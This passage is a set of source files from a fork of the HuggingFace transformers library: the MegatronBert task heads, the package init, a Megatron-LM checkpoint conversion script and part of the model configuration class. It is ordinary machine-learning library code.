        logits = self.classifier(pooled_output)
        loss = None
        if labels is not None:
            # Infer the task type once and persist it on the config:
            # 1 label -> regression; >1 integer labels -> single-label
            # classification; otherwise multi-label classification.
            if self.config.problem_type is None:
                if self.num_labels == 1:
                    self.config.problem_type = "regression"
                elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
                    self.config.problem_type = "single_label_classification"
                else:
                    self.config.problem_type = "multi_label_classification"
            if self.config.problem_type == "regression":
                loss_fct = MSELoss()
                if self.num_labels == 1:
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif self.config.problem_type == "single_label_classification":
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            elif self.config.problem_type == "multi_label_classification":
                loss_fct = BCEWithLogitsLoss()
                loss = loss_fct(logits, labels)
        if not return_dict:
            output = (logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output
        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """
    MegatronBert Model with a multiple choice classification head on top (a linear layer on top of the pooled output
    and a softmax) e.g. for RocStories/SWAG tasks.
    """,
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForMultipleChoice(MegatronBertPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.bert = MegatronBertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # One score per choice; choices are compared via a softmax over the
        # reshaped logits in `forward`.
        self.classifier = nn.Linear(config.hidden_size, 1)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(
        MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
    )
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=MultipleChoiceModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, MultipleChoiceModelOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the multiple choice classification loss. Indices should be in `[0, ...,
            num_choices-1]` where `num_choices` is the size of the second dimension of the input tensors. (See
            `input_ids` above)
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
        # Flatten (batch, num_choices, seq) -> (batch * num_choices, seq) so the
        # backbone scores every choice independently in a single pass.
        input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
        attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
        token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
        position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
        inputs_embeds = (
            inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
            if inputs_embeds is not None
            else None
        )
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        pooled_output = outputs[1]
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)
        # Restore the choice dimension: (batch * num_choices, 1) -> (batch, num_choices).
        reshaped_logits = logits.view(-1, num_choices)
        loss = None
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
        if not return_dict:
            output = (reshaped_logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output
        return MultipleChoiceModelOutput(
            loss=loss,
            logits=reshaped_logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """
    MegatronBert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g.
    for Named-Entity-Recognition (NER) tasks.
    """,
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForTokenClassification(MegatronBertPreTrainedModel):
    # The pooler is never used by this head (add_pooling_layer=False below),
    # so its checkpoint weights are dropped on load.
    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        # Backbone without pooler; classification works on per-token states.
        self.bert = MegatronBertModel(config, add_pooling_layer=False)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TokenClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, TokenClassifierOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
        """
        if return_dict is None:
            return_dict = self.config.use_return_dict
        backbone_outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # Per-token hidden states -> dropout -> per-token label scores.
        token_states = self.dropout(backbone_outputs[0])
        logits = self.classifier(token_states)
        loss = None
        if labels is not None:
            # Flatten batch and sequence dims for the cross-entropy computation.
            loss = CrossEntropyLoss()(logits.view(-1, self.num_labels), labels.view(-1))
        if return_dict:
            return TokenClassifierOutput(
                loss=loss,
                logits=logits,
                hidden_states=backbone_outputs.hidden_states,
                attentions=backbone_outputs.attentions,
            )
        # Legacy tuple path: (loss?, logits, *extra backbone outputs).
        tuple_output = (logits,) + backbone_outputs[2:]
        if loss is None:
            return tuple_output
        return (loss,) + tuple_output
@add_start_docstrings(
    """
    MegatronBert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a
    linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
    """,
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForQuestionAnswering(MegatronBertPreTrainedModel):
    # The pooler is not built for QA (add_pooling_layer=False below), so pooler
    # weights found in a checkpoint are expected and silently ignored at load time.
    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        # Encoder without the pooling layer: QA only needs per-token hidden states.
        self.bert = MegatronBertModel(config, add_pooling_layer=False)
        # Maps each token's hidden state to `num_labels` span logits.
        self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=QuestionAnsweringModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        start_positions: Optional[torch.LongTensor] = None,
        end_positions: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, QuestionAnsweringModelOutput]:
        r"""
        start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        """
        # Resolve the output format from the config when the caller does not specify it.
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = outputs[0]
        logits = self.qa_outputs(sequence_output)
        # Split the per-token logits into (start, end) score columns.
        # NOTE(review): the 2-way unpack assumes config.num_labels == 2 — confirm against callers.
        start_logits, end_logits = logits.split(1, dim=-1)
        start_logits = start_logits.squeeze(-1).contiguous()
        end_logits = end_logits.squeeze(-1).contiguous()
        total_loss = None
        if start_positions is not None and end_positions is not None:
            # If we are on multi-GPU, split add a dimension
            if len(start_positions.size()) > 1:
                start_positions = start_positions.squeeze(-1)
            if len(end_positions.size()) > 1:
                end_positions = end_positions.squeeze(-1)
            # sometimes the start/end positions are outside our model inputs, we ignore these terms:
            # out-of-range positions are clamped to `sequence_length`, which is then passed to
            # CrossEntropyLoss as `ignore_index`, so those examples contribute no loss.
            ignored_index = start_logits.size(1)
            start_positions = start_positions.clamp(0, ignored_index)
            end_positions = end_positions.clamp(0, ignored_index)
            loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
            start_loss = loss_fct(start_logits, start_positions)
            end_loss = loss_fct(end_logits, end_positions)
            # Average the two span losses.
            total_loss = (start_loss + end_loss) / 2
        if not return_dict:
            # Legacy tuple output: span logits followed by remaining encoder outputs;
            # the loss is prepended if computed.
            output = (start_logits, end_logits) + outputs[2:]
            return ((total_loss,) + output) if total_loss is not None else output
        return QuestionAnsweringModelOutput(
            loss=total_loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,506 | src/transformers/models/megatron_bert/__init__.py | # Copyright 2021 NVIDIA Corporation and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available
# Declares the public API of this package; consumed by `_LazyModule` below so
# that submodules are only imported on first attribute access.
_import_structure = {
    "configuration_megatron_bert": ["MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "MegatronBertConfig"],
}
# The modeling symbols are only registered when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_megatron_bert"] = [
        "MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST",
        "MegatronBertForCausalLM",
        "MegatronBertForMaskedLM",
        "MegatronBertForMultipleChoice",
        "MegatronBertForNextSentencePrediction",
        "MegatronBertForPreTraining",
        "MegatronBertForQuestionAnswering",
        "MegatronBertForSequenceClassification",
        "MegatronBertForTokenClassification",
        "MegatronBertModel",
        "MegatronBertPreTrainedModel",
    ]
# For static type checkers, perform the real (eager) imports instead of the lazy proxy.
if TYPE_CHECKING:
    from .configuration_megatron_bert import MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP, MegatronBertConfig
    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_megatron_bert import (
            MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
            MegatronBertForCausalLM,
            MegatronBertForMaskedLM,
            MegatronBertForMultipleChoice,
            MegatronBertForNextSentencePrediction,
            MegatronBertForPreTraining,
            MegatronBertForQuestionAnswering,
            MegatronBertForSequenceClassification,
            MegatronBertForTokenClassification,
            MegatronBertModel,
            MegatronBertPreTrainedModel,
        )
else:
    import sys
    # Replace this module object with a lazy proxy that resolves `_import_structure`
    # entries on demand.
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 13,685 | src/transformers/models/megatron_bert/convert_megatron_bert_checkpoint.py | ####################################################################################################
# Copyright (c) 2021-, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
####################################################################################################
#
# Note: If when running this conversion script you're getting an exception:
# ModuleNotFoundError: No module named 'megatron.model.enums'
# you need to tell python where to find the clone of Megatron-LM, e.g.:
#
# cd /tmp
# git clone https://github.com/NVIDIA/Megatron-LM
# PYTHONPATH=/tmp/Megatron-LM python src/transformers/models/megatron_bert/convert_megatron_bert_checkpoint.py ...
#
# if you already have it cloned elsewhere, simply adjust the path to the existing path
#
# If the training was done using a Megatron-LM fork, e.g.,
# https://github.com/microsoft/Megatron-DeepSpeed/ then chances are that you need to have that one
# in your path, i.e., /path/to/Megatron-DeepSpeed/
#
import argparse
import os
import re
import zipfile
import torch
from transformers import MegatronBertConfig
####################################################################################################
def recursive_print(name, val, spaces=0):
    """Pretty-print a (possibly nested) state dict for inspection.

    Dict values recurse with extra indentation; tensor values print their size;
    anything else prints its repr. `name is None` (the root call) prints no header.
    """
    # Build the header for this entry, unless we are at the anonymous root.
    if name is None:
        msg = None
    else:
        width = 50 - spaces
        msg = "." * max(0, spaces - 2) + ("# {:" + str(width) + "s}").format(name)
    if isinstance(val, dict):
        # Print the header (if any), then descend one level deeper.
        if msg is not None:
            print(msg)
        for child_name, child_val in val.items():
            recursive_print(child_name, child_val, spaces + 2)
    elif isinstance(val, torch.Tensor):
        # Tensors would flood the output; show only their shape.
        print(msg, ":", val.size())
    else:
        print(msg, ":", val)
def fix_query_key_value_ordering(param, checkpoint_version, num_splits, num_heads, hidden_size):
    """Permute a fused QKV weight/bias into the [num_splits * num_heads * hidden_size, :] layout.

    This matches the layout used by later NVIDIA Megatron-LM versions; the inverse
    is applied by Megatron-LM when reading checkpoints:
    https://github.com/NVIDIA/Megatron-LM/blob/v2.4/megatron/checkpointing.py#L209
    A self-attention *weight* returned here still needs one more transpose before
    HuggingFace BERT can consume it. Checkpoint versions other than 1.0 / >=2.0
    are returned unchanged.
    """
    original_shape = param.size()
    if checkpoint_version == 1.0:
        # version 1.0 stores [num_heads * hidden_size * num_splits, :]
        param = param.view(num_heads, hidden_size, num_splits, *original_shape[1:])
        param = param.transpose(0, 2).transpose(1, 2).contiguous()
    elif checkpoint_version >= 2.0:
        # other versions store [num_heads * num_splits * hidden_size, :]
        param = param.view(num_heads, num_splits, hidden_size, *original_shape[1:])
        param = param.transpose(0, 1).contiguous()
    # Collapse the split/head/hidden axes back into the original flat shape.
    return param.view(*original_shape)
####################################################################################################
def convert_megatron_checkpoint(args, input_state_dict, config):
    """Convert a Megatron-LM BERT state dict to the HuggingFace MegatronBert layout.

    Args:
        args: Parsed command-line namespace (accepted for interface compatibility;
            not read inside this function).
        input_state_dict (dict): Raw checkpoint dictionary loaded from the Megatron file.
        config (MegatronBertConfig): Target configuration. When the checkpoint stores
            its training args, the config's dimensions are overridden from them
            (mutated in place).

    Returns:
        dict: A state dict keyed with HuggingFace `bert.*` / `cls.*` parameter names.
    """
    # The converted output model.
    output_state_dict = {}
    # Old versions did not store training args.
    ds_args = input_state_dict.get("args", None)
    if ds_args is not None:
        # Do not make the user write a config file when the exact dimensions/sizes are
        # already in the checkpoint.
        # from pprint import pprint
        # pprint(vars(ds_args))
        config.tokenizer_type = ds_args.tokenizer_type
        config.vocab_size = ds_args.padded_vocab_size
        config.max_position_embeddings = ds_args.max_position_embeddings
        config.hidden_size = ds_args.hidden_size
        config.num_hidden_layers = ds_args.num_layers
        config.num_attention_heads = ds_args.num_attention_heads
        config.intermediate_size = ds_args.ffn_hidden_size if "ffn_hidden_size" in ds_args else 4 * ds_args.hidden_size
        # pprint(config)
    # The number of heads.
    heads = config.num_attention_heads
    # The hidden_size per head; drives the QKV re-ordering below.
    hidden_size_per_head = config.hidden_size // heads
    # Megatron-LM checkpoint version (0.0 for old checkpoints that did not record one).
    if "checkpoint_version" in input_state_dict.keys():
        checkpoint_version = input_state_dict["checkpoint_version"]
    else:
        checkpoint_version = 0.0
    # The model.
    model = input_state_dict["model"]
    # The language model.
    lm = model["language_model"]
    # The embeddings.
    embeddings = lm["embedding"]
    # The word embeddings.
    word_embeddings = embeddings["word_embeddings"]["weight"]
    # Truncate the embedding table to vocab_size rows (Megatron pads the vocab).
    word_embeddings = word_embeddings[: config.vocab_size, :]
    # Store the word embeddings.
    output_state_dict["bert.embeddings.word_embeddings.weight"] = word_embeddings
    # The position embeddings.
    pos_embeddings = embeddings["position_embeddings"]["weight"]
    assert pos_embeddings.size(0) == config.max_position_embeddings and pos_embeddings.size(1) == config.hidden_size
    # Store the position embeddings.
    output_state_dict["bert.embeddings.position_embeddings.weight"] = pos_embeddings
    # The token-type embeddings.
    tokentype_embeddings = embeddings["tokentype_embeddings"]["weight"]
    # Store the token-type embeddings.
    output_state_dict["bert.embeddings.token_type_embeddings.weight"] = tokentype_embeddings
    # The transformer (key renamed to "encoder" in newer Megatron versions).
    transformer = lm["transformer"] if "transformer" in lm.keys() else lm["encoder"]
    # The regex to extract layer names. NOTE: this must be a raw string — the
    # previous non-raw form made "\." and "\d" invalid escape sequences.
    layer_re = re.compile(r"layers\.(\d+)\.([a-z0-9_.]+)\.([a-z]+)")
    # The simple map of names for "automated" rules.
    megatron_to_transformers = {
        "attention.dense": ".attention.output.dense.",
        "self_attention.dense": ".attention.output.dense.",
        "mlp.dense_h_to_4h": ".intermediate.dense.",
        "mlp.dense_4h_to_h": ".output.dense.",
    }
    # Keep track of the attention/query/value tensor between the weight and bias entries.
    attention_qkv_weight = None
    # Extract the layers.
    for key, val in transformer.items():
        # Match the name.
        m = layer_re.match(key)
        # Stop if that's not a layer. NOTE: relies on all "layers.*" entries coming
        # before the non-layer keys (e.g. final_layernorm.*) in the dict order.
        if m is None:
            break
        # The index of the layer.
        layer_idx = int(m.group(1))
        # The name of the operation.
        op_name = m.group(2)
        # Is it a weight or a bias?
        weight_or_bias = m.group(3)
        # The name of the layer.
        layer_name = f"bert.encoder.layer.{layer_idx}"
        # For layernorm(s), simply store the layer norm.
        if op_name.endswith("layernorm"):
            ln_name = "attention.ln" if op_name.startswith("input") else "ln"
            output_state_dict[layer_name + "." + ln_name + "." + weight_or_bias] = val
        # Transpose the QKV matrix.
        elif (
            op_name == "attention.query_key_value" or op_name == "self_attention.query_key_value"
        ) and weight_or_bias == "weight":
            # Make sure the QKV pointer is nil (weight must precede bias in the dict).
            assert attention_qkv_weight is None, ""
            out_val = fix_query_key_value_ordering(val, checkpoint_version, 3, heads, hidden_size_per_head)
            # Store the tensor as we need the bias as well to interleave QKV and biases.
            attention_qkv_weight = out_val
        # Transpose the bias.
        elif (
            op_name == "attention.query_key_value" or op_name == "self_attention.query_key_value"
        ) and weight_or_bias == "bias":
            # Make sure we read the weight tensor.
            assert attention_qkv_weight is not None, ""
            # Split the QKV matrix into Q, K and V. Megatron stores Q,K,V interleaved.
            q = attention_qkv_weight[0 * config.hidden_size : 1 * config.hidden_size, :]
            k = attention_qkv_weight[1 * config.hidden_size : 2 * config.hidden_size, :]
            v = attention_qkv_weight[2 * config.hidden_size : 3 * config.hidden_size, :]
            out_val = fix_query_key_value_ordering(val, checkpoint_version, 3, heads, hidden_size_per_head)
            # Split the bias.
            q_bias = out_val[0 * config.hidden_size : 1 * config.hidden_size]
            k_bias = out_val[1 * config.hidden_size : 2 * config.hidden_size]
            v_bias = out_val[2 * config.hidden_size : 3 * config.hidden_size]
            # Store.
            output_state_dict[f"{layer_name}.attention.self.query.weight"] = q
            output_state_dict[f"{layer_name}.attention.self.query.bias"] = q_bias
            output_state_dict[f"{layer_name}.attention.self.key.weight"] = k
            output_state_dict[f"{layer_name}.attention.self.key.bias"] = k_bias
            output_state_dict[f"{layer_name}.attention.self.value.weight"] = v
            output_state_dict[f"{layer_name}.attention.self.value.bias"] = v_bias
            # Clear the stored tensor.
            attention_qkv_weight = None
        # Copy weights and biases as is.
        elif weight_or_bias in ["weight", "bias"]:
            out_name = megatron_to_transformers[op_name]
            output_state_dict[layer_name + out_name + weight_or_bias] = val
    # The final layernorm.
    output_state_dict["bert.encoder.ln.weight"] = transformer["final_layernorm.weight"]
    output_state_dict["bert.encoder.ln.bias"] = transformer["final_layernorm.bias"]
    # The pooler.
    pooler = lm["pooler"]
    # Store the matrix and the bias.
    output_state_dict["bert.pooler.dense.weight"] = pooler["dense.weight"]
    output_state_dict["bert.pooler.dense.bias"] = pooler["dense.bias"]
    # The LM head from Megatron (for RACE).
    lm_head = model["lm_head"]
    # The transform matrix.
    output_state_dict["cls.predictions.transform.dense.weight"] = lm_head["dense.weight"]
    output_state_dict["cls.predictions.transform.dense.bias"] = lm_head["dense.bias"]
    # The transform LN.
    output_state_dict["cls.predictions.transform.LayerNorm.weight"] = lm_head["layernorm.weight"]
    output_state_dict["cls.predictions.transform.LayerNorm.bias"] = lm_head["layernorm.bias"]
    # For the decoder, we replicate the (truncated) word-embedding weights.
    output_state_dict["cls.predictions.decoder.weight"] = word_embeddings
    output_state_dict["cls.predictions.bias"] = lm_head["bias"]
    # The classifier from Megatron (for MNLI).
    binary_head = model["binary_head"]
    # Store the classifier.
    output_state_dict["cls.seq_relationship.weight"] = binary_head["weight"]
    output_state_dict["cls.seq_relationship.bias"] = binary_head["bias"]
    # It should be done!
    return output_state_dict
####################################################################################################
def main():
    """CLI entry point: load a Megatron-LM BERT checkpoint, convert it, and save
    the HuggingFace config + state dict next to the input checkpoint."""
    # Command-line interface (argument names kept identical for compatibility).
    parser = argparse.ArgumentParser()
    parser.add_argument("--print-checkpoint-structure", action="store_true")
    parser.add_argument("path_to_checkpoint", type=str, help="Path to the ZIP file containing the checkpoint")
    parser.add_argument(
        "--config_file",
        default="",
        type=str,
        help="An optional config json file describing the pre-trained model.",
    )
    args = parser.parse_args()
    checkpoint_path = args.path_to_checkpoint
    # Outputs are written to the directory that contains the checkpoint.
    output_dir = os.path.dirname(checkpoint_path)
    # Load the raw state dict; the .zip wrapper is optional (backward compatibility).
    print(f'Extracting PyTorch state dictionary from "{checkpoint_path}"')
    if checkpoint_path.endswith(".zip"):
        with zipfile.ZipFile(checkpoint_path, "r") as archive:
            with archive.open("release/mp_rank_00/model_optim_rng.pt") as handle:
                input_state_dict = torch.load(handle, map_location="cpu")
    else:
        input_state_dict = torch.load(checkpoint_path, map_location="cpu")
    # Build the target config: either from a user-supplied JSON file, or from the
    # default megatron-bert 345m config with the vocab size read off the checkpoint
    # (the uncased/cased 345m variants differ in vocab size).
    if args.config_file:
        config = MegatronBertConfig.from_json_file(args.config_file)
    else:
        config = MegatronBertConfig()
        config.vocab_size = input_state_dict["model"]["lm_head"]["bias"].numel()
    # Convert.
    print("Converting")
    output_state_dict = convert_megatron_checkpoint(args, input_state_dict, config)
    # Optionally dump the structure of the converted state dict.
    if args.print_checkpoint_structure:
        recursive_print(None, output_state_dict)
    # Persist the config.
    print("Saving config")
    config.save_pretrained(output_dir)
    # Persist the converted weights.
    output_checkpoint_file = os.path.join(output_dir, "pytorch_model.bin")
    print(f'Saving checkpoint to "{output_checkpoint_file}"')
    torch.save(output_state_dict, output_checkpoint_file)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,573 | src/transformers/models/megatron_bert/configuration_megatron_bert.py | # coding=utf-8
# Copyright 2021- NVIDIA Corporation and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" MEGATRON_BERT model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
MEGATRON_BERT_PRETRAINED_CONFIG_ARCHIVE_MAP = {
# See all MEGATRON_BERT models at https://huggingface.co/models?filter=bert
}
class MegatronBertConfig(PretrainedConfig):
    r"""
    Configuration for [`MegatronBertModel`], defining the model architecture. Instantiating
    a configuration with the defaults yields a configuration similar to that of the MEGATRON_BERT
    [nvidia/megatron-bert-uncased-345m](https://huggingface.co/nvidia/megatron-bert-uncased-345m) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs;
    read the [`PretrainedConfig`] documentation for the inherited options.

    Args:
        vocab_size (`int`, *optional*, defaults to 29056):
            Size of the vocabulary, i.e. the number of distinct tokens representable by the `inputs_ids`
            passed when calling [`MegatronBertModel`].
        hidden_size (`int`, *optional*, defaults to 1024):
            Dimensionality of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 24):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 16):
            Number of attention heads per attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 4096):
            Width of the "intermediate" (feed-forward) layer inside each encoder block.
        hidden_act (`str` or `Callable`, *optional*, defaults to `"gelu"`):
            Non-linear activation used in the encoder and pooler; `"gelu"`, `"relu"`, `"silu"` and
            `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
            Dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
            Dropout ratio applied to the attention probabilities.
        max_position_embeddings (`int`, *optional*, defaults to 512):
            Maximum sequence length the model might ever be used with; typically set large just in case
            (e.g., 512 or 1024 or 2048).
        type_vocab_size (`int`, *optional*, defaults to 2):
            Vocabulary size of the `token_type_ids` passed when calling [`MegatronBertModel`].
        initializer_range (`float`, *optional*, defaults to 0.02):
            Standard deviation of the truncated_normal_initializer used for all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            Epsilon used by the layer normalization layers.
        position_embedding_type (`str`, *optional*, defaults to `"absolute"`):
            One of `"absolute"`, `"relative_key"`, `"relative_key_query"`. For `"relative_key"`, see
            [Self-Attention with Relative Position Representations (Shaw et al.)](https://arxiv.org/abs/1803.02155);
            for `"relative_key_query"`, see *Method 4* in [Improve Transformer Models with Better Relative
            Position Embeddings (Huang et al.)](https://arxiv.org/abs/2009.13658).
        is_decoder (`bool`, *optional*, defaults to `False`):
            Whether the model is used as a decoder; if `False`, it is used as an encoder.
        use_cache (`bool`, *optional*, defaults to `True`):
            Whether the model should return the last key/values attentions (not used by all models).
            Only relevant if `config.is_decoder=True`.

    Examples:
    ```python
    >>> from transformers import MegatronBertConfig, MegatronBertModel
    >>> # Initializing a MEGATRON_BERT bert-base-uncased style configuration
    >>> configuration = MegatronBertConfig()
    >>> # Initializing a model (with random weights) from the bert-base-uncased style configuration
    >>> model = MegatronBertModel(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""
    model_type = "megatron-bert"
    def __init__(
        self,
        vocab_size=29056,
        hidden_size=1024,
        num_hidden_layers=24,
        num_attention_heads=16,
        intermediate_size=4096,
        hidden_act="gelu",
        hidden_dropout_prob=0.1,
        attention_probs_dropout_prob=0.1,
        max_position_embeddings=512,
        type_vocab_size=2,
        initializer_range=0.02,
        layer_norm_eps=1e-12,
        pad_token_id=0,
        position_embedding_type="absolute",
        use_cache=True,
        **kwargs,
    ):
        # The base class handles the padding token and all generic options.
        super().__init__(pad_token_id=pad_token_id, **kwargs)
        # Core model dimensions.
        self.vocab_size = vocab_size
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        # Non-linearity and regularization.
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        # Embedding sizes and position-embedding behavior.
        self.max_position_embeddings = max_position_embeddings
        self.type_vocab_size = type_vocab_size
